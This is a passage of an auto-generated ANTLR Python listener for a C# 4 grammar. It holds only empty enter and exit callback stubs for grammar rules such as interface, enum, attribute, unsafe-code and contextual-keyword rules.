def enterInterface_modifier(self, ctx: CSharp4Parser.Interface_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifier.
def exitInterface_modifier(self, ctx: CSharp4Parser.Interface_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#variant_type_parameter_list.
def enterVariant_type_parameter_list(self, ctx: CSharp4Parser.Variant_type_parameter_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#variant_type_parameter_list.
def exitVariant_type_parameter_list(self, ctx: CSharp4Parser.Variant_type_parameter_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#variant_type_parameters.
def enterVariant_type_parameters(self, ctx: CSharp4Parser.Variant_type_parametersContext):
pass
# Exit a parse tree produced by CSharp4Parser#variant_type_parameters.
def exitVariant_type_parameters(self, ctx: CSharp4Parser.Variant_type_parametersContext):
pass
# Enter a parse tree produced by CSharp4Parser#variance_annotation.
def enterVariance_annotation(self, ctx: CSharp4Parser.Variance_annotationContext):
pass
# Exit a parse tree produced by CSharp4Parser#variance_annotation.
def exitVariance_annotation(self, ctx: CSharp4Parser.Variance_annotationContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_base.
def enterInterface_base(self, ctx: CSharp4Parser.Interface_baseContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_base.
def exitInterface_base(self, ctx: CSharp4Parser.Interface_baseContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_body.
def enterInterface_body(self, ctx: CSharp4Parser.Interface_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_body.
def exitInterface_body(self, ctx: CSharp4Parser.Interface_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_member_declarations.
def enterInterface_member_declarations(self, ctx: CSharp4Parser.Interface_member_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_member_declarations.
def exitInterface_member_declarations(self, ctx: CSharp4Parser.Interface_member_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_member_declaration.
def enterInterface_member_declaration(self, ctx: CSharp4Parser.Interface_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_member_declaration.
def exitInterface_member_declaration(self, ctx: CSharp4Parser.Interface_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_method_declaration.
def enterInterface_method_declaration(self, ctx: CSharp4Parser.Interface_method_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_method_declaration.
def exitInterface_method_declaration(self, ctx: CSharp4Parser.Interface_method_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_property_declaration.
def enterInterface_property_declaration(self, ctx: CSharp4Parser.Interface_property_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_property_declaration.
def exitInterface_property_declaration(self, ctx: CSharp4Parser.Interface_property_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_accessors.
def enterInterface_accessors(self, ctx: CSharp4Parser.Interface_accessorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_accessors.
def exitInterface_accessors(self, ctx: CSharp4Parser.Interface_accessorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_event_declaration.
def enterInterface_event_declaration(self, ctx: CSharp4Parser.Interface_event_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_event_declaration.
def exitInterface_event_declaration(self, ctx: CSharp4Parser.Interface_event_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_indexer_declaration.
def enterInterface_indexer_declaration(self, ctx: CSharp4Parser.Interface_indexer_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_indexer_declaration.
def exitInterface_indexer_declaration(self, ctx: CSharp4Parser.Interface_indexer_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#enum_declaration.
def enterEnum_declaration(self, ctx: CSharp4Parser.Enum_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#enum_declaration.
def exitEnum_declaration(self, ctx: CSharp4Parser.Enum_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#enum_base.
def enterEnum_base(self, ctx: CSharp4Parser.Enum_baseContext):
pass
# Exit a parse tree produced by CSharp4Parser#enum_base.
def exitEnum_base(self, ctx: CSharp4Parser.Enum_baseContext):
pass
# Enter a parse tree produced by CSharp4Parser#enum_body.
def enterEnum_body(self, ctx: CSharp4Parser.Enum_bodyContext):
pass
# Exit a parse tree produced by CSharp4Parser#enum_body.
def exitEnum_body(self, ctx: CSharp4Parser.Enum_bodyContext):
pass
# Enter a parse tree produced by CSharp4Parser#enum_modifiers.
def enterEnum_modifiers(self, ctx: CSharp4Parser.Enum_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#enum_modifiers.
def exitEnum_modifiers(self, ctx: CSharp4Parser.Enum_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#enum_modifier.
def enterEnum_modifier(self, ctx: CSharp4Parser.Enum_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#enum_modifier.
def exitEnum_modifier(self, ctx: CSharp4Parser.Enum_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#enum_member_declarations.
def enterEnum_member_declarations(self, ctx: CSharp4Parser.Enum_member_declarationsContext):
pass
# Exit a parse tree produced by CSharp4Parser#enum_member_declarations.
def exitEnum_member_declarations(self, ctx: CSharp4Parser.Enum_member_declarationsContext):
pass
# Enter a parse tree produced by CSharp4Parser#enum_member_declaration.
def enterEnum_member_declaration(self, ctx: CSharp4Parser.Enum_member_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#enum_member_declaration.
def exitEnum_member_declaration(self, ctx: CSharp4Parser.Enum_member_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_declaration.
def enterDelegate_declaration(self, ctx: CSharp4Parser.Delegate_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_declaration.
def exitDelegate_declaration(self, ctx: CSharp4Parser.Delegate_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifiers.
def enterDelegate_modifiers(self, ctx: CSharp4Parser.Delegate_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifiers.
def exitDelegate_modifiers(self, ctx: CSharp4Parser.Delegate_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifier.
def enterDelegate_modifier(self, ctx: CSharp4Parser.Delegate_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifier.
def exitDelegate_modifier(self, ctx: CSharp4Parser.Delegate_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#global_attributes.
def enterGlobal_attributes(self, ctx: CSharp4Parser.Global_attributesContext):
pass
# Exit a parse tree produced by CSharp4Parser#global_attributes.
def exitGlobal_attributes(self, ctx: CSharp4Parser.Global_attributesContext):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_sections.
def enterGlobal_attribute_sections(self, ctx: CSharp4Parser.Global_attribute_sectionsContext):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_sections.
def exitGlobal_attribute_sections(self, ctx: CSharp4Parser.Global_attribute_sectionsContext):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_section.
def enterGlobal_attribute_section(self, ctx: CSharp4Parser.Global_attribute_sectionContext):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_section.
def exitGlobal_attribute_section(self, ctx: CSharp4Parser.Global_attribute_sectionContext):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_target_specifier.
def enterGlobal_attribute_target_specifier(self, ctx: CSharp4Parser.Global_attribute_target_specifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_target_specifier.
def exitGlobal_attribute_target_specifier(self, ctx: CSharp4Parser.Global_attribute_target_specifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#global_attribute_target.
def enterGlobal_attribute_target(self, ctx: CSharp4Parser.Global_attribute_targetContext):
pass
# Exit a parse tree produced by CSharp4Parser#global_attribute_target.
def exitGlobal_attribute_target(self, ctx: CSharp4Parser.Global_attribute_targetContext):
pass
# Enter a parse tree produced by CSharp4Parser#attributes.
def enterAttributes(self, ctx: CSharp4Parser.AttributesContext):
pass
# Exit a parse tree produced by CSharp4Parser#attributes.
def exitAttributes(self, ctx: CSharp4Parser.AttributesContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_sections.
def enterAttribute_sections(self, ctx: CSharp4Parser.Attribute_sectionsContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_sections.
def exitAttribute_sections(self, ctx: CSharp4Parser.Attribute_sectionsContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_section.
def enterAttribute_section(self, ctx: CSharp4Parser.Attribute_sectionContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_section.
def exitAttribute_section(self, ctx: CSharp4Parser.Attribute_sectionContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_target_specifier.
def enterAttribute_target_specifier(self, ctx: CSharp4Parser.Attribute_target_specifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_target_specifier.
def exitAttribute_target_specifier(self, ctx: CSharp4Parser.Attribute_target_specifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_target.
def enterAttribute_target(self, ctx: CSharp4Parser.Attribute_targetContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_target.
def exitAttribute_target(self, ctx: CSharp4Parser.Attribute_targetContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_list.
def enterAttribute_list(self, ctx: CSharp4Parser.Attribute_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_list.
def exitAttribute_list(self, ctx: CSharp4Parser.Attribute_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute.
def enterAttribute(self, ctx: CSharp4Parser.AttributeContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute.
def exitAttribute(self, ctx: CSharp4Parser.AttributeContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_name.
def enterAttribute_name(self, ctx: CSharp4Parser.Attribute_nameContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_name.
def exitAttribute_name(self, ctx: CSharp4Parser.Attribute_nameContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_arguments.
def enterAttribute_arguments(self, ctx: CSharp4Parser.Attribute_argumentsContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_arguments.
def exitAttribute_arguments(self, ctx: CSharp4Parser.Attribute_argumentsContext):
pass
# Enter a parse tree produced by CSharp4Parser#positional_argument_list.
def enterPositional_argument_list(self, ctx: CSharp4Parser.Positional_argument_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#positional_argument_list.
def exitPositional_argument_list(self, ctx: CSharp4Parser.Positional_argument_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#positional_argument.
def enterPositional_argument(self, ctx: CSharp4Parser.Positional_argumentContext):
pass
# Exit a parse tree produced by CSharp4Parser#positional_argument.
def exitPositional_argument(self, ctx: CSharp4Parser.Positional_argumentContext):
pass
# Enter a parse tree produced by CSharp4Parser#named_argument_list.
def enterNamed_argument_list(self, ctx: CSharp4Parser.Named_argument_listContext):
pass
# Exit a parse tree produced by CSharp4Parser#named_argument_list.
def exitNamed_argument_list(self, ctx: CSharp4Parser.Named_argument_listContext):
pass
# Enter a parse tree produced by CSharp4Parser#named_argument.
def enterNamed_argument(self, ctx: CSharp4Parser.Named_argumentContext):
pass
# Exit a parse tree produced by CSharp4Parser#named_argument.
def exitNamed_argument(self, ctx: CSharp4Parser.Named_argumentContext):
pass
# Enter a parse tree produced by CSharp4Parser#attribute_argument_expression.
def enterAttribute_argument_expression(self, ctx: CSharp4Parser.Attribute_argument_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#attribute_argument_expression.
def exitAttribute_argument_expression(self, ctx: CSharp4Parser.Attribute_argument_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#class_modifier_unsafe.
def enterClass_modifier_unsafe(self, ctx: CSharp4Parser.Class_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#class_modifier_unsafe.
def exitClass_modifier_unsafe(self, ctx: CSharp4Parser.Class_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_modifier_unsafe.
def enterStruct_modifier_unsafe(self, ctx: CSharp4Parser.Struct_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_modifier_unsafe.
def exitStruct_modifier_unsafe(self, ctx: CSharp4Parser.Struct_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#interface_modifier_unsafe.
def enterInterface_modifier_unsafe(self, ctx: CSharp4Parser.Interface_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#interface_modifier_unsafe.
def exitInterface_modifier_unsafe(self, ctx: CSharp4Parser.Interface_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#delegate_modifier_unsafe.
def enterDelegate_modifier_unsafe(self, ctx: CSharp4Parser.Delegate_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#delegate_modifier_unsafe.
def exitDelegate_modifier_unsafe(self, ctx: CSharp4Parser.Delegate_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#field_modifier_unsafe.
def enterField_modifier_unsafe(self, ctx: CSharp4Parser.Field_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#field_modifier_unsafe.
def exitField_modifier_unsafe(self, ctx: CSharp4Parser.Field_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#method_modifier_unsafe.
def enterMethod_modifier_unsafe(self, ctx: CSharp4Parser.Method_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#method_modifier_unsafe.
def exitMethod_modifier_unsafe(self, ctx: CSharp4Parser.Method_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#property_modifier_unsafe.
def enterProperty_modifier_unsafe(self, ctx: CSharp4Parser.Property_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#property_modifier_unsafe.
def exitProperty_modifier_unsafe(self, ctx: CSharp4Parser.Property_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#event_modifier_unsafe.
def enterEvent_modifier_unsafe(self, ctx: CSharp4Parser.Event_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#event_modifier_unsafe.
def exitEvent_modifier_unsafe(self, ctx: CSharp4Parser.Event_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#indexer_modifier_unsafe.
def enterIndexer_modifier_unsafe(self, ctx: CSharp4Parser.Indexer_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#indexer_modifier_unsafe.
def exitIndexer_modifier_unsafe(self, ctx: CSharp4Parser.Indexer_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#operator_modifier_unsafe.
def enterOperator_modifier_unsafe(self, ctx: CSharp4Parser.Operator_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#operator_modifier_unsafe.
def exitOperator_modifier_unsafe(self, ctx: CSharp4Parser.Operator_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#constructor_modifier_unsafe.
def enterConstructor_modifier_unsafe(self, ctx: CSharp4Parser.Constructor_modifier_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#constructor_modifier_unsafe.
def exitConstructor_modifier_unsafe(self, ctx: CSharp4Parser.Constructor_modifier_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#destructor_declaration_unsafe.
def enterDestructor_declaration_unsafe(self, ctx: CSharp4Parser.Destructor_declaration_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#destructor_declaration_unsafe.
def exitDestructor_declaration_unsafe(self, ctx: CSharp4Parser.Destructor_declaration_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#static_constructor_modifiers_unsafe.
def enterStatic_constructor_modifiers_unsafe(self, ctx: CSharp4Parser.Static_constructor_modifiers_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#static_constructor_modifiers_unsafe.
def exitStatic_constructor_modifiers_unsafe(self, ctx: CSharp4Parser.Static_constructor_modifiers_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#embedded_statement_unsafe.
def enterEmbedded_statement_unsafe(self, ctx: CSharp4Parser.Embedded_statement_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#embedded_statement_unsafe.
def exitEmbedded_statement_unsafe(self, ctx: CSharp4Parser.Embedded_statement_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#unsafe_statement.
def enterUnsafe_statement(self, ctx: CSharp4Parser.Unsafe_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#unsafe_statement.
def exitUnsafe_statement(self, ctx: CSharp4Parser.Unsafe_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#type_unsafe.
def enterType_unsafe(self, ctx: CSharp4Parser.Type_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#type_unsafe.
def exitType_unsafe(self, ctx: CSharp4Parser.Type_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#pointer_type.
def enterPointer_type(self, ctx: CSharp4Parser.Pointer_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#pointer_type.
def exitPointer_type(self, ctx: CSharp4Parser.Pointer_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#unmanaged_type.
def enterUnmanaged_type(self, ctx: CSharp4Parser.Unmanaged_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#unmanaged_type.
def exitUnmanaged_type(self, ctx: CSharp4Parser.Unmanaged_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#primary_no_array_creation_expression_unsafe.
def enterPrimary_no_array_creation_expression_unsafe(self, ctx: CSharp4Parser.Primary_no_array_creation_expression_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#primary_no_array_creation_expression_unsafe.
def exitPrimary_no_array_creation_expression_unsafe(self, ctx: CSharp4Parser.Primary_no_array_creation_expression_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#unary_expression_unsafe.
def enterUnary_expression_unsafe(self, ctx: CSharp4Parser.Unary_expression_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#unary_expression_unsafe.
def exitUnary_expression_unsafe(self, ctx: CSharp4Parser.Unary_expression_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#pointer_indirection_expression.
def enterPointer_indirection_expression(self, ctx: CSharp4Parser.Pointer_indirection_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#pointer_indirection_expression.
def exitPointer_indirection_expression(self, ctx: CSharp4Parser.Pointer_indirection_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#addressof_expression.
def enterAddressof_expression(self, ctx: CSharp4Parser.Addressof_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#addressof_expression.
def exitAddressof_expression(self, ctx: CSharp4Parser.Addressof_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#sizeof_expression.
def enterSizeof_expression(self, ctx: CSharp4Parser.Sizeof_expressionContext):
pass
# Exit a parse tree produced by CSharp4Parser#sizeof_expression.
def exitSizeof_expression(self, ctx: CSharp4Parser.Sizeof_expressionContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_statement.
def enterFixed_statement(self, ctx: CSharp4Parser.Fixed_statementContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_statement.
def exitFixed_statement(self, ctx: CSharp4Parser.Fixed_statementContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_declarators.
def enterFixed_pointer_declarators(self, ctx: CSharp4Parser.Fixed_pointer_declaratorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_declarators.
def exitFixed_pointer_declarators(self, ctx: CSharp4Parser.Fixed_pointer_declaratorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_declarator.
def enterFixed_pointer_declarator(self, ctx: CSharp4Parser.Fixed_pointer_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_declarator.
def exitFixed_pointer_declarator(self, ctx: CSharp4Parser.Fixed_pointer_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_pointer_initializer.
def enterFixed_pointer_initializer(self, ctx: CSharp4Parser.Fixed_pointer_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_pointer_initializer.
def exitFixed_pointer_initializer(self, ctx: CSharp4Parser.Fixed_pointer_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#struct_member_declaration_unsafe.
def enterStruct_member_declaration_unsafe(self, ctx: CSharp4Parser.Struct_member_declaration_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#struct_member_declaration_unsafe.
def exitStruct_member_declaration_unsafe(self, ctx: CSharp4Parser.Struct_member_declaration_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declaration.
def enterFixed_size_buffer_declaration(self, ctx: CSharp4Parser.Fixed_size_buffer_declarationContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declaration.
def exitFixed_size_buffer_declaration(self, ctx: CSharp4Parser.Fixed_size_buffer_declarationContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_modifiers.
def enterFixed_size_buffer_modifiers(self, ctx: CSharp4Parser.Fixed_size_buffer_modifiersContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_modifiers.
def exitFixed_size_buffer_modifiers(self, ctx: CSharp4Parser.Fixed_size_buffer_modifiersContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_modifier.
def enterFixed_size_buffer_modifier(self, ctx: CSharp4Parser.Fixed_size_buffer_modifierContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_modifier.
def exitFixed_size_buffer_modifier(self, ctx: CSharp4Parser.Fixed_size_buffer_modifierContext):
pass
# Enter a parse tree produced by CSharp4Parser#buffer_element_type.
def enterBuffer_element_type(self, ctx: CSharp4Parser.Buffer_element_typeContext):
pass
# Exit a parse tree produced by CSharp4Parser#buffer_element_type.
def exitBuffer_element_type(self, ctx: CSharp4Parser.Buffer_element_typeContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declarators.
def enterFixed_size_buffer_declarators(self, ctx: CSharp4Parser.Fixed_size_buffer_declaratorsContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declarators.
def exitFixed_size_buffer_declarators(self, ctx: CSharp4Parser.Fixed_size_buffer_declaratorsContext):
pass
# Enter a parse tree produced by CSharp4Parser#fixed_size_buffer_declarator.
def enterFixed_size_buffer_declarator(self, ctx: CSharp4Parser.Fixed_size_buffer_declaratorContext):
pass
# Exit a parse tree produced by CSharp4Parser#fixed_size_buffer_declarator.
def exitFixed_size_buffer_declarator(self, ctx: CSharp4Parser.Fixed_size_buffer_declaratorContext):
pass
# Enter a parse tree produced by CSharp4Parser#local_variable_initializer_unsafe.
def enterLocal_variable_initializer_unsafe(self, ctx: CSharp4Parser.Local_variable_initializer_unsafeContext):
pass
# Exit a parse tree produced by CSharp4Parser#local_variable_initializer_unsafe.
def exitLocal_variable_initializer_unsafe(self, ctx: CSharp4Parser.Local_variable_initializer_unsafeContext):
pass
# Enter a parse tree produced by CSharp4Parser#stackalloc_initializer.
def enterStackalloc_initializer(self, ctx: CSharp4Parser.Stackalloc_initializerContext):
pass
# Exit a parse tree produced by CSharp4Parser#stackalloc_initializer.
def exitStackalloc_initializer(self, ctx: CSharp4Parser.Stackalloc_initializerContext):
pass
# Enter a parse tree produced by CSharp4Parser#from_contextual_keyword.
def enterFrom_contextual_keyword(self, ctx: CSharp4Parser.From_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#from_contextual_keyword.
def exitFrom_contextual_keyword(self, ctx: CSharp4Parser.From_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#let_contextual_keyword.
def enterLet_contextual_keyword(self, ctx: CSharp4Parser.Let_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#let_contextual_keyword.
def exitLet_contextual_keyword(self, ctx: CSharp4Parser.Let_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#where_contextual_keyword.
def enterWhere_contextual_keyword(self, ctx: CSharp4Parser.Where_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#where_contextual_keyword.
def exitWhere_contextual_keyword(self, ctx: CSharp4Parser.Where_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#join_contextual_keyword.
def enterJoin_contextual_keyword(self, ctx: CSharp4Parser.Join_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#join_contextual_keyword.
def exitJoin_contextual_keyword(self, ctx: CSharp4Parser.Join_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#on_contextual_keyword.
def enterOn_contextual_keyword(self, ctx: CSharp4Parser.On_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#on_contextual_keyword.
def exitOn_contextual_keyword(self, ctx: CSharp4Parser.On_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#equals_contextual_keyword.
def enterEquals_contextual_keyword(self, ctx: CSharp4Parser.Equals_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#equals_contextual_keyword.
def exitEquals_contextual_keyword(self, ctx: CSharp4Parser.Equals_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#into_contextual_keyword.
def enterInto_contextual_keyword(self, ctx: CSharp4Parser.Into_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#into_contextual_keyword.
def exitInto_contextual_keyword(self, ctx: CSharp4Parser.Into_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#orderby_contextual_keyword.
def enterOrderby_contextual_keyword(self, ctx: CSharp4Parser.Orderby_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#orderby_contextual_keyword.
def exitOrderby_contextual_keyword(self, ctx: CSharp4Parser.Orderby_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#ascending_contextual_keyword.
def enterAscending_contextual_keyword(self, ctx: CSharp4Parser.Ascending_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#ascending_contextual_keyword.
def exitAscending_contextual_keyword(self, ctx: CSharp4Parser.Ascending_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#descending_contextual_keyword.
def enterDescending_contextual_keyword(self, ctx: CSharp4Parser.Descending_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#descending_contextual_keyword.
def exitDescending_contextual_keyword(self, ctx: CSharp4Parser.Descending_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#select_contextual_keyword.
def enterSelect_contextual_keyword(self, ctx: CSharp4Parser.Select_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#select_contextual_keyword.
def exitSelect_contextual_keyword(self, ctx: CSharp4Parser.Select_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#group_contextual_keyword.
def enterGroup_contextual_keyword(self, ctx: CSharp4Parser.Group_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#group_contextual_keyword.
def exitGroup_contextual_keyword(self, ctx: CSharp4Parser.Group_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#by_contextual_keyword.
def enterBy_contextual_keyword(self, ctx: CSharp4Parser.By_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#by_contextual_keyword.
def exitBy_contextual_keyword(self, ctx: CSharp4Parser.By_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#partial_contextual_keyword.
def enterPartial_contextual_keyword(self, ctx: CSharp4Parser.Partial_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#partial_contextual_keyword.
def exitPartial_contextual_keyword(self, ctx: CSharp4Parser.Partial_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#alias_contextual_keyword.
def enterAlias_contextual_keyword(self, ctx: CSharp4Parser.Alias_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#alias_contextual_keyword.
def exitAlias_contextual_keyword(self, ctx: CSharp4Parser.Alias_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#yield_contextual_keyword.
def enterYield_contextual_keyword(self, ctx: CSharp4Parser.Yield_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#yield_contextual_keyword.
def exitYield_contextual_keyword(self, ctx: CSharp4Parser.Yield_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#get_contextual_keyword.
def enterGet_contextual_keyword(self, ctx: CSharp4Parser.Get_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#get_contextual_keyword.
def exitGet_contextual_keyword(self, ctx: CSharp4Parser.Get_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#set_contextual_keyword.
def enterSet_contextual_keyword(self, ctx: CSharp4Parser.Set_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#set_contextual_keyword.
def exitSet_contextual_keyword(self, ctx: CSharp4Parser.Set_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#add_contextual_keyword.
def enterAdd_contextual_keyword(self, ctx: CSharp4Parser.Add_contextual_keywordContext):
pass
# Exit a parse tree produced by CSharp4Parser#add_contextual_keyword.
def exitAdd_contextual_keyword(self, ctx: CSharp4Parser.Add_contextual_keywordContext):
pass
# Enter a parse tree produced by CSharp4Parser#remove_contextual_keyword.
